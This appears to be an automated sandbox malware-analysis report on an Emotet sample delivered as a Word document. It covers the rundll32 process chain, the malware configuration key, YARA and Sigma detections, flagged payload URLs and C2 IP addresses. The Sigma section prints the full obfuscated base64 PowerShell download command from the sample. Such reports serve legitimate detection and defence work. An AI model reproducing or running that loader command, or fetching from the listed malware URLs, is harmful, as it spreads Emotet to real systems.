        • rundll32.exe (PID: 2532 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2760 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ocet\gyzufj.pjr',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2696 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mylz\dnoauh.fda',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2708 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Skqv\bpgr.lft',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 824 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2468 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeay\tsbyty.hpi',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2472 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jfjk\etjwcl.eoy',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2804 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 3008 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fpxy\zbyjv.xxd',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 3012 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xcmo\muvihv.sjs',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2104461658.0000000000251000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000005.00000002.2095452042.0000000001C04000.00000004.00000040.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x1f30:$s1: POwersheLL
    00000007.00000002.2097868806.0000000000201000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000A.00000002.2102162180.0000000000190000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000009.00000002.2100838145.0000000000180000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          14.2.rundll32.exe.1e0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            9.2.rundll32.exe.1a0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              9.2.rundll32.exe.180000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                15.2.rundll32.exe.1d0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  10.2.rundll32.exe.190000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    Click to see the 25 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                    Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnA

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for URL or domainShow sources
                    Source: https://goldilockstraining.com/wp-includes/bftt/Avira URL Cloud: Label: malware
                    Source: http://biglaughs.org/smallpotatoes/rRwRzc/Avira URL Cloud: Label: malware
                    Source: http://paulscomputing.com/CraigsMagicSquare/H/Avira URL Cloud: Label: malware
                    Source: http://goldcoastoffice365.com/temp/X/Avira URL Cloud: Label: phishing
                    Source: http://goldcoastoffice365.com/temp/X/PAvira URL Cloud: Label: phishing
                    Source: http://azraktours.com/wp-content/NWF9jC/Avira URL Cloud: Label: malware
                    Source: http://josegene.com/theme/gU8/Avira URL Cloud: Label: malware
                    Source: https://jeffdahlke.com/css/bg4n3/Avira URL Cloud: Label: malware
                    Multi AV Scanner detection for dropped fileShow sources
                    Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dllReversingLabs: Detection: 89%
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: Informacion_4-09757.docMetadefender: Detection: 36%Perma Link
                    Source: Informacion_4-09757.docReversingLabs: Detection: 75%
                    Machine Learning detection for dropped fileShow sources
                    Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dllJoe Sandbox ML: detected
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2101464007.000000001B3D0000.00000002.00000001.sdmp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: global trafficDNS query: name: paulscomputing.com
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 167.71.148.58:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 216.218.207.98:80

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)